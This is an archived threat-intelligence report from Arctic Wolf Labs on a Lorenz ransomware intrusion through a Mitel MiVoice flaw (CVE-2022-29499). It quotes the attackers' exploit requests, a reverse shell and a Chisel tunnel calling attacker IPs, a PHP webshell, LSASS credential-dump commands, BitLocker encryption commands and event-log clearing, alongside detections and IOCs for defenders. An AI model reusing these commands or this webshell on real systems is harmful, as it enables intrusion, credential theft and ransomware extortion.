{
	"id": "e40facae-0f19-4300-a73a-d7c51d5e2183",
	"created_at": "2026-04-06T00:16:27.0084Z",
	"updated_at": "2026-04-10T13:11:18.782288Z",
	"deleted_at": null,
	"sha1_hash": "4f0719a9d313b41ca1b7625d4f51d4b6d6b51a4f",
	"title": "Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 161724,
	"plain_text": "Chiseling In: Lorenz Ransomware Group Cracks MiVoice And\r\nCalls Back For Free\r\nBy Markus Neis, Ross Phillips, Steven Campbell, Teresa Whitmore, Alex Ammons, and Arctic Wolf Labs Team\r\nPublished: 2022-09-12 · Archived: 2026-04-05 23:41:34 UTC\r\nKey Takeaways\r\nArctic Wolf Labs assesses with medium confidence that the Lorenz ransomware group exploited CVE-2022-29499 to compromise Mitel MiVoice Connect to gain initial access\r\nLorenz waited nearly a month after obtaining initial access to conduct additional activity\r\nLorenz exfiltrated data via FileZilla\r\nEncryption was done via BitLocker and Lorenz ransomware on ESXi\r\nLorenz employed a high degree of Operational Security (OPSEC)\r\nRansomware groups continue to use Living Off the Land Binaries (LOLBins) and gaining access to 0day\r\nexploits\r\nProcess and PowerShell Logging can significantly aid incident responders and potentially help decrypt\r\nencrypted files\r\nBackground\r\nThe Arctic Wolf Labs team recently investigated a Lorenz ransomware intrusion, which leveraged a Mitel\r\nMiVoice VoIP appliance vulnerability (CVE-2022-29499) for initial access and Microsoft’s BitLocker Drive\r\nEncryption for data encryption. Lorenz is a ransomware group that has been active since at least February 2021\r\nand like many ransomware groups, performs double-extortion by exfiltrating data before encrypting systems. Over\r\nthe last quarter, the group has primarily targeted small and medium businesses (SMBs) located in the United\r\nStates, with outliers in China and Mexico.\r\nMonitoring just critical assets is not enough for organizations, security teams should monitor all externally facing\r\ndevices for potential malicious activity, including VoIP and IoT devices. Threat actors are beginning to shift\r\ntargeting to lesser known or monitored assets to avoid detection. In the current landscape, many organizations\r\nheavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP devices and IoT\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 1 of 13\n\ndevices without proper monitoring, which enables threat actors to gain a foothold into an environment without\r\nbeing detected.\r\nTechnical Analysis\r\nInitial Access\r\nInitial malicious activity originated from a Mitel appliance sitting on the network perimeter. Lorenz exploited\r\nCVE-2022-29499, a remote code execution vulnerability impacting the Mitel Service Appliance component of\r\nMiVoice Connect, to obtain a reverse shell and subsequently used Chisel as a tunnelling tool to pivot into the\r\nenvironment.\r\nIn late-June, researchers at CrowdStrike published a blog article detailing the vulnerability and a suspected\r\nransomware intrusion attempt leveraging it for initial access. Although post-exploitation details were limited,\r\nArctic Wolf Labs observed significant overlap in the reported Tactics, Techniques, and Procedures (TTPs) tied to\r\ninitial access.\r\nThe following GET requests were observed, leading to successful exploitation of CVE-2022-29499:\r\n\"GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:137\r\n\"GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:137.184.181[.]252/$PWD|sh|? HTTP/1.0\" 200\r\nAfter successful exploitation, the threat actors leveraged cURL to download a shell script called wc2_deploy\r\nGET //shoretel/wc2_deploy HTTP/1.1\r\nUser-Agent: curl/7.29.0\r\nHost: 137.184.181.252\r\nAccept: */*\r\nThe wc2_deploy shell script, when executed, establishes an SSL-encrypted reverse shell using living-off-the-land\r\ntechniques via the mkfifo command and OpenSSL.\r\nmkfifo /tmp/.svc_bkp_1; /bin/sh -i \u003c /tmp/.svc_bkp_1 2\u003e\u00261|\r\nopenssl s_client -quiet -connect 137.184.181[.]252:443 \u003e /tmp/.svc_bkp_1;\r\nrm /tmp/.svc_bkp_1\r\nA packet capture demonstrated that the reverse shell established on 137.184.181[.]252:443 was a ncat SSL\r\nlistener.\r\n\u003cSNIP\u003e\r\n`0...localhost0K..`.H...B.\r\n.\u003e.\u003cAutomatically generated by Ncat. See https://nmap.org/ncat/.0\r\n\u003c/SNIP\u003e\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 2 of 13\n\nPost-Exploitation Activity\r\nOnce a reverse shell was established, the threat actors made use of the Mitel device’s command line interface\r\n(stcli) to create a hidden directory and proceeded to download a compiled binary of the open source TCP\r\ntunneling tool Chisel directly from Github via wget. The threat actors renamed the Chisel binary to mem,\r\nunzipped it, and then executed it to establish a connection back to a Chisel server listening at\r\nhxxps[://]137.184.181[.]252[:]8443, skipping TLS certificate verification and turning the client into a SOCKS\r\nproxy for the threat actor.\r\nstcli\r\nsu\r\nmkdir /tmp/.coreDump/ \u0026\u0026 cd /tmp/.coreDump/ \u0026\u0026 wget https://github.com/jpillora/chisel/rel\r\neases/download/v1.7.6/chisel_1.7.6_linux_386.gz -O /tmp/.coreDump/mem.gz \u0026\u0026 gzip -d /tmp/\r\n.coreDump/mem.gz \u0026\u0026 chmod 777 /tmp/.coreDump/mem \u0026\u0026 /tmp/.coreDump/mem client\r\n--tls-skip-verify --fingerprint '\u003cRedacted\u003e' https://137.184.181[.]252:8443 R:socks \u0026 exit\r\nContext Chisel\r\nSHA256    97ff99fd824a02106d20d167e2a2b647244712a558639524e7db1e6a2064a68d\r\nFilename mem\r\nPersistence\r\nIt is worth noting that, after exploitation of the Mitel device, Lorenz did not immediately proceed with any further\r\nactivity for about a month. Upon returning to the Mitel device, the threat actors interacted with a webshell named\r\npdf_import_export.php located in the path /vhelp/pdf/en/. The webshell expects a triple base64 encoded command\r\nsent via POST request.\r\n\u003c?php if(isset($_POST[\"ucba\"])){try { $kka=$_POST[\"ucba\"];\r\n$lalldl=base64_decode(base64_decode(base64_decode($kka)));\r\n$handle = popen(\"$lalldl 2\u003e\u00261\", \"r\");\r\n$read = fread($handle, 2096);\r\necho base64_encode(base64_encode(base64_encode($read))).\"|\\n\"\r\n;pclose($handle); } catch (Exception $e) {}; };?\u003e\r\nContext Webshell\r\nSHA256    07838ac8fd5a59bb741aae0cf3abf48296677be7ac0864c4f124c2e168c0af94\r\nFilename pdf_import_export.php\r\nWe have medium confidence that the webshell was placed onto the device during the initial exploitation. This is\r\nbased on no additional exploitation activity being observed upon returning to the Mitel device.\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 3 of 13\n\nShortly after interacting with the webshell, we observed the Mitel device initiate a reverse shell and Chisel tunnel\r\nagain. This time using 138.68.59[.]16[:]443 for the SSL ncat reverse shell and hxxps[://]138.68.59[.]16[:]8443 for\r\nChisel. Lorenz went on to leverage Chisel’s SOCKS functionality to pivot into the victim’s network.\r\nCredential Access\r\nThe threat actors relied heavily on CrackMapExec for follow-on activity through the SOCKS tunnel.\r\nCrackMapExec was first used to dump credentials remotely via comsvcs, implemented via the lsassy module. The\r\nmodule first identifies the PID of the Local Security Authority Subsystem Service (LSASS) and then creates a full\r\nLSASS memory dump.\r\nCmD.eXe /Q /c for /f \\\"tokens=1,2 delims= \\\" ^%A in ('\\\"tasklist /fi \\\"Imagename eq lsass.exe\\\"\r\n| find \\\"lsass\\\"\\\"')\r\ndo rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump ^%B \\\\Windows\\\\Temp\\\\kMekF.dbf full\r\nInvestigating PowerShell logs we identified that this activity was quickly followed by Out-Minidump which\r\nabuses Windows Error Reporting to dump LSASS memory and is like comsvcs, implemented in CrackMapExec\r\nas part of the lsassy module.\r\npowErsHeLl.eXE -NoP $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorRepo\r\n;$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic');\r\n$Flags = [Reflection.BindingFlags] 'NonPublic, Static';\r\n$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags);\r\n$ProcessDumpPath = '\\Windows\\Temp\\bSpRLV.tar';\r\n$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create);\r\n$p=Get-Process lsass;\r\n$Result = $MiniDumpWriteDump.Invoke($null, @($p.Handle,$p.Id,$FileStream.SafeFileHandle,[UInt32] 2,[I\r\n;$FileStream.Close()\r\nDiscovery\r\nAfter dumping credentials, the threat actor began network and domain enumeration activity. They first leveraged\r\ncertutil to identify the Active Directories Certificate Authorities (CA) registered within the forest and the server\r\nhosting the service.\r\ncertutil --config - -ping\r\nnetsh was then used to display the firewall status immediately followed by ipconfig to display the TCP/IP\r\nconfiguration for all adapters followed by netstat to enumerate all active TCP connections.\r\nnetsh advfirewall show allprofiles state\r\nipconfig /all\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 4 of 13\n\nnetstat -anp tcp\r\nThe threat actors searched through compromised device directories looking for passwords by doing a recursive\r\nlisting of file contents and leveraging the Windows command findstr.\r\ncmd.exe /C Dir /s/b E:\\\\\u003cREDACTED\\\\ |findstr passw\r\nAdditionally the threat actors checked for running instances of PowerShell.\r\ncmd.exe /C tasklist /v | findstr PowerShell.exe\r\nPrivilege Escalation and Lateral Movement\r\nLorenz obtained credentials for two privileged administrator accounts, one with local admin privileges and one\r\nwith domain admin privileges. These accounts were used to move laterally through the environment via RDP and\r\nsubsequently to a domain controller.\r\nExfiltration\r\nPrior to beginning encryption, the threat actors leveraged the compromised administrator accounts to install\r\nFileZilla. FileZilla was then used to exfiltrate data via SSH on port 22 to one of the following IP addresses:\r\nIP address Country ASN ASN Organisation\r\n138.197.218[.]11 US 14061 DIGITALOCEAN-ASN\r\n138.68.19[.]94 US 14061 DIGITALOCEAN-ASN\r\n159.65.248[.]159 US 14061 DIGITALOCEAN-ASN\r\n206.188.197[.]125 NL 399629 BL Networks\r\n64.190.113[.]100 US 399629 BL Networks\r\nEncryption\r\nLorenz leveraged Microsoft’s BitLocker Drive Encryption by creating a file called worm.txt and then executing\r\nthe file on the domain controller remotely via atexec.\r\ncmd.exe /C powershell.exe Get-Content C:\\\\\u003cRedacted\u003e\\worm.txt| PowerShell.exe -noprofile - \u003e C:\\\\Wind\r\nThrough existing PowerShell logging we identified the contents of worm.txt, which contained PowerShell code to\r\nobtain a list of all computers and then remotely create a scheduled task named network. The scheduled task would\r\nobtain the contents from \\\\\u003cREDACTED-DOMAIN\u003e\\NETLOGON\\security_watermark.jpg and immediately run,\r\nstarting the encryption process.\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 5 of 13\n\n$cred = New-Object System.Management.Automation.PSCredential ('\u003cREDACTED-DOMAIN\u003e\\\u003cREDACTED-USER\u003e', $p\r\nBecause of the sensitivity we can only provide some parts of network   (which is actually a PowerShell script, not\r\na jpeg image).\r\nThe first portion of network adds multiple keys to the registry via the reg add command to prepare the devices for\r\nBitLocker encryption. The key RecoveryKeyMessage contained the unique Lorenz ransomware Tor URL to\r\nconduct negotiations between the threat actor and victim. The BitLocker recovery message would then be\r\ndisplayed on the pre-boot key recovery screen after the device was encrypted.\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseTPM /t REG_DWORD /d 2 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseTPMKey /t REG_DWORD /d 2 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseTPMKeyPIN /t REG_DWORD /d 2 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v RecoveryKeyMessage /t REG_SZ /d 'http://\u003cREDACTED\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /V RecoveryKeyMessageSource /t REG_DWORD /d 2 /f;\r\nREG ADD HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE /v UseTPMPIN /t REG_DWORD /d 2 /f;\r\nNote: In some instances the reg add command would fail if HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE does\r\nnot exist, inhibiting encryption on some devices.\r\nNext security_watermark.jpg attempts to install BitLocker, including all role services and applicable management\r\ntools, via the Install-WindowsFeature cmdlet. This was followed by enabling BitLocker via the PowerShell cmdlet\r\nenable-BitLocker.\r\nInstall-WindowsFeature BitLocker -IncludeAllSubFeature -IncludeManagementTools -Restart;\"enable-BitLo\r\nNote the -password parameter contains an $UnsecurePassword string. Capturing the plaintext password allowed\r\nthe victim to decrypt nearly 95% of their encrypted endpoints.\r\nThe threat actors kept track of the encryption progress by sending an HTTP POST request to\r\nhxxp://206.188.197[.]125 (one of the IP addresses used for data exfiltration) via the Invoke-WebRequest. The\r\nPOST request included the encryption progress displayed as a percentage.\r\nInvoke-WebRequest -Uri hxxp://206.188.197[.]125/ -Method POST -Body ($postParams| ConvertTo-Json);Wri\r\nAfter the encryption process the script clears all event logs.\r\nGet-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }\r\nAlthough Lorenz primarily leveraged BitLocker for encryption, we observed a select few ESXi hosts with Lorenz\r\nransomware.\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 6 of 13\n\nRecommendations\r\nUpgrade to MiVoice Connect Version R19.3\r\nIn July 2022, Mitel released MiVoice Connect version R19.3, which fully remediates CVE-2022-29499. We\r\nrecommend upgrading to version R19.3 to prevent potential exploitation of this vulnerability. On April 19, 2022,\r\nMitel provided a script for releases 19.2 SP3 and earlier, and R14.x and earlier as a workaround before the release\r\nof R19.3.\r\nNote: Arctic Wolf recommends following change management best practices for deploying security patches,\r\nincluding testing changes in a dev environment before deploying to production to avoid operational impact.\r\nProduct Impacted Versions Fixed Version\r\nMiVoice Connect\r\nR19.2 SP3 and earlier\r\nR14.x and earlier\r\nMiVoice Connect R19.3\r\nMitel Security Advisory\r\nScan External Appliances and Web Applications\r\nExternal scans are an integral part in assessing your organization’s footprint and hardening your environment and\r\nsecurity posture. You cannot protect assets that you do not know about and external scans can help your\r\norganization discover those assets. Furthermore, external scans can help define an organization’s attack surface\r\nacross devices exposed to the Internet.\r\nDo Not Expose Critical Assets Directly to the Internet\r\nUpon reviewing external scan results, ensure critical assets are not directly exposed to the Internet. If a device\r\ndoes not need to be on the perimeter, remove it. Removing a device from your network perimeter will reduce your\r\norganization’s attack surface.\r\nConfigure PowerShell Logging\r\nArctic Wolf Labs is continuously investigating attacks in which PowerShell was used extensively throughout all\r\nphases of the attack. We recommend to turn on Module Logging, Script Block Logging, and Transcription\r\nLogging and send logs to a centralised logging solution\r\nConfigure Off-Site Logging\r\nAlways ensure that critical assets are monitored and that captured logs are stored externally to your organization.\r\nOtherwise, detailed forensic analysis options may be limited when threat actors take evasive actions to hide their\r\ntracks.\r\nBackups\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 7 of 13\n\nEstablish a tested online – offline backup strategy for data as well as gold images and identify weak points a threat\r\nactor might exploit. Saving just one backup file will not be enough to ensure your data is protected and\r\nrecoverable.\r\nLimit the Blast Radius of Potential Attacks\r\nTo limit the amount of damage that would be inflicted in a potential attack, privileged credentials should never be\r\nexposed on lower-tier assets. By adhering to this principle, the likelihood that a threat actor would be able to\r\nsuccessfully gain access to a domain controller is reduced. Implementing logical network segmentation based on\r\nprivileges limits a threat actor’s ability to move laterally (e.g., restricting domain administrators from logging into\r\nworkstations).\r\nDetections\r\nNetwork Detections\r\nArctic Wolf Labs has created custom Suricata rules to aid in identification of the malicious activity described in\r\nthis blog.\r\nThe rules can be downloaded here: https://github.com/rtkwlf/wolf-tools/threat-intelligence/lorenz-ransomware-chiseling-in/lorenz-suricata.rules\r\nThe following Snort signatures available in Emerging Threats’ ET Community ruleset can also be used to detect\r\nrelevant activity:\r\n2037121 — ET EXPLOIT: Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-\r\n29499)\r\n2001980 — ET POLICY: SSH Client Banner Detected on Unusual Port\r\nEndpoint Detections\r\nArctic Wolf Labs has created custom Yara rules to aid in identification of the malicious activity described in this\r\nblog.\r\nThe rules can be downloaded here: https://github.com/rtkwlf/wolf-tools/threat-intelligence/lorenz-ransomware-chiseling-in/lorenz-yara.yar\r\nThe following SIGMA rules shared by SigmaHQ can detect numerous endpoint TTPs used by Lorenz\r\nProcess Dump via Comsvcs DLL\r\nAccessing WinAPI in PowerShell for Credentials Dumping\r\nRemote Task Creation via ATSVC Named Pipe\r\nPowerShell as a Service in Registry\r\nCrackMapExec Process Patterns\r\nEncoded PowerShell Command Line Usage of ConvertTo-SecureString\r\nIndicators of Compromise\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 8 of 13\n\nNote: A full copy of these IOCs can be downloaded as a CSV file here\r\nIndicator Type Context\r\n137.184.181[.]252\r\nIP\r\nAddress\r\nUsed to exploit\r\nthe Mitel device\r\n(CVE-2022-\r\n29499)\r\n138.197.218[.]11\r\nIP\r\nAddress\r\nData exfiltration\r\nvia FileZilla\r\n138.68.19[.]94\r\nIP\r\nAddress\r\nData exfiltration\r\nvia FileZilla\r\n138.68.59[.]16\r\nIP\r\nAddress\r\nUsed to\r\ndownload Chisel\r\n159.65.248[.]159\r\nIP\r\nAddress\r\nData exfiltration\r\nvia FileZilla\r\n206.188.197[.]125\r\nIP\r\nAddress\r\nData exfiltration\r\nvia FileZilla;\r\nHTTP POST\r\nrequests to notify\r\nthreat actors of\r\nencryption\r\nprogress\r\n64.190.113[.]100\r\nIP\r\nAddress\r\nData exfiltration\r\nvia FileZilla\r\n97ff99fd824a02106d20d167e2a2b647244712a558639524e7db1e6a2064a68d\r\nSHA-256\r\nChisel\r\n07838ac8fd5a59bb741aae0cf3abf48296677be7ac0864c4f124c2e168c0af94\r\nSHA-256\r\nWebshell\r\nATT\u0026CK Matrix\r\nTactic ID Name Details\r\nInitial Access T1190\r\nExploit Public-Facing\r\nApplication\r\nLorenz exploited CVE-2022-29499 on an\r\nexposed Mitel device, achieving Remote\r\nCode Execution (RCE).\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 9 of 13\n\nResource\r\nDevelopment\r\nT1588.002 Obtain Capabilities – Tools\r\nFileZilla was downloaded by Lorenz to\r\nexfiltrate data.\r\nChisel a TCP Tunneling tool was\r\ndownloaded from Github by Lorenz.\r\nT1587.001\r\nDevelop Capabilities –\r\nMalware\r\nLorenz developed the BitLocker\r\ndeployment script.\r\nPersistence T1505.003\r\nServer Software Component\r\n– Webshell\r\nLorenz created a webshell on the\r\nvulnerable device for persistence.\r\nCommand \u0026\r\nControl\r\nT1095\r\nT1090\r\nNon-Application Layer\r\nProtocol\r\nProxy\r\nChisel client was used to create a SOCKS5\r\nconnection over port 8443 to attacker\r\ncontrolled IP.\r\nT1573 Encrypted Channel\r\nReverse shell used a localhost TLS\r\ncertificate for encryption.\r\nCredential\r\nAccess\r\nT1003.001 LSASS Memory\r\nCrackMapExec using lsassy to dump\r\nLSASS remotely.\r\nExecution\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter – Powershell PowerShell and Windows command shell\r\nwere both used to launch malware as well\r\nas interact with Windows utilities and\r\nT1059.003 native APIs.\r\nCommand and Scripting\r\nInterpreter – Windows\r\nCommand Shell\r\nT1112 Modify Registry\r\nThe deployment PowerShell script added\r\nregistry keys that are required for\r\nBitLocker configuration.\r\nT1053.005 Scheduled Task\r\natexec was used via Task Scheduler.\r\nThe BitLocker encryption was initiated via\r\nScheduled Task.\r\nDiscovery\r\nT1016 System Network Discovery Lorenz used various commands to gather\r\nnetwork information (netstat, ipconfig,\r\nT1518.001 Security Software Discovery netsh, certutil, etc.)\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nLorenz recursively searched through\r\ndirectories on the initially compromised\r\ndevice looking for passwords.\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 10 of 13\n\nPrivilege\r\nEscalation\r\nT1078.002 Domain Accounts\r\nLorenz obtained domain administrator\r\ncredentials\r\nT1078.003 Local Accounts\r\nLorenz obtained local administrator\r\ncredentials\r\nLateral\r\nMovement\r\nT1021.001\r\nRemote Services – Remote\r\nDesktop Protocol\r\nLorenz used obtained local and domain\r\nadministrator credentials to move laterally\r\nvia RDP.\r\nT1078.002\r\nValid Accounts – Domain\r\nAccounts\r\nT1078.003\r\nValid Accounts – Local\r\nAccounts\r\nData\r\nExfiltration\r\nT1048.002\r\nExfiltration Over\r\nAsymmetric Encrypted Non-C2 Protocol\r\nThe data was exfiltrated to attacker\r\ncontrolled IPs using FileZilla SFTP over\r\nport 22.\r\nImpact\r\nT1486 Data Encrypted for Impact\r\nLorenz leveraged BitLocker to encrypt\r\nsystems.\r\nLorenz encrypted ESXi\r\nT1529 System Shutdown/Reboot\r\nThe PowerShell script included a command\r\nto shutdown and restart host.\r\nDefense\r\nEvasion\r\nT1070.001\r\nIndicator Removal on Host\r\n– Clear Windows Event Log\r\nEvent logs were cleared.\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nThe BitLocker deployment PowerShell\r\nscript had a JPG extension.\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 11 of 13\n\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nReferences\r\nhttps://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002\r\nhttps://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/\r\nBy Markus Neis, Ross Phillips, Steven Campbell, Teresa Whitmore, Alex Ammons, and Arctic\r\nWolf Labs Team\r\nMarkus Neis \r\nMarkus Neis is a Principal Threat Intelligence Researcher in Arctic Wolf Labs focused on leading advanced threat\r\nresearch. He has more than a decade of experience in researching adversary tradecraft and responding to\r\nsophisticated attacks. \r\nRoss Phillips \r\nRoss is a Sr. Threat Intelligence Researcher at Arctic Wolf Labs with almost a decade of experience in the security\r\nlandscape. Prior to this, Ross worked as a Technical Lead for the Arctic Wolf SOC and an Internal Tech Resident\r\nat Google after graduating from Rochester Institute of Technology in 2012 majoring in Information Security \u0026\r\nForensics. \r\nSteven Campbell \r\nSteven Campbell is a Threat Intelligence Researcher at Arctic Wolf Labs and has more than eight years of\r\nexperience in intelligence analysis and security research. He has a strong background in infrastructure analysis and\r\nadversary tradecraft. \r\nTeresa Whitmore \r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 12 of 13\n\nTeresa Whitmore is a Forensic Analyst at Tetra Defense, an Arctic Wolf company, focused on leading incident\r\nresponse and digital forensic investigations. She has more than a decade of combined experience in DFIR, cyber\r\ndefense operations, and malware analysis. \r\nAlex Ammons \r\nAlex Ammons is a forensics analyst at Tetra Defense, an Arctic Wolf company, and has numerous certifications\r\nand operational experience from the Department of Defense and National Security Agency. Alex is seasoned in\r\nincident response and offensive and defensive cyber operations. \r\nSource: https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/"
	],
	"report_names": [
		"lorenz-ransomware-chiseling-in"
	],
	"threat_actors": [],
	"ts_created_at": 1775434587,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f0719a9d313b41ca1b7625d4f51d4b6d6b51a4f.pdf",
		"text": "https://archive.orkl.eu/4f0719a9d313b41ca1b7625d4f51d4b6d6b51a4f.txt",
		"img": "https://archive.orkl.eu/4f0719a9d313b41ca1b7625d4f51d4b6d6b51a4f.jpg"
	}
}